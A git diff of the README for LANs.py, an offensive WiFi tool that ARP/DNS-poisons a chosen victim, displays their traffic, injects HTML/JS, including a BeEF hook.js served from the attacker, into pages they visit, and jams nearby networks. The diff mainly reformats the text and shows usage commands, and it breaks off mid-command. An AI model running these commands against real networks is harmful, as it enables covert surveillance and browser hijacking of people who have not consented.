diff --git a/README.md b/README.md index 94b4367..a09a72a 100644 --- a/README.md +++ b/README.md @@ -1,14 +1,13 @@ LANs.py ======== -Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. Technically: multithreaded asynchronous packet parsing/injecting ARP/DNS poisoner. +* Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. + * Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. -Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. - -Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. +* Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously) -Prereqs: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option +Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. @@ -24,10 +23,10 @@ Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [--directedonly] [--accesspoint ACCESSPOINT] ``` -Usage +#Usage ----- -### Common usage: +#### Common usage: ``` shell python LANs.py -u -p @@ -50,7 +49,7 @@ python LANs.py -u -p -d -ip 192.168.0.10 -ip: target this IP address and skip the active targeting at the beginning -### HTML injection: +#### HTML injection: ``` shell python LANs.py -b http://192.168.0.5:3000/hook.js @@ -66,7 +65,7 @@ python LANs.py -c '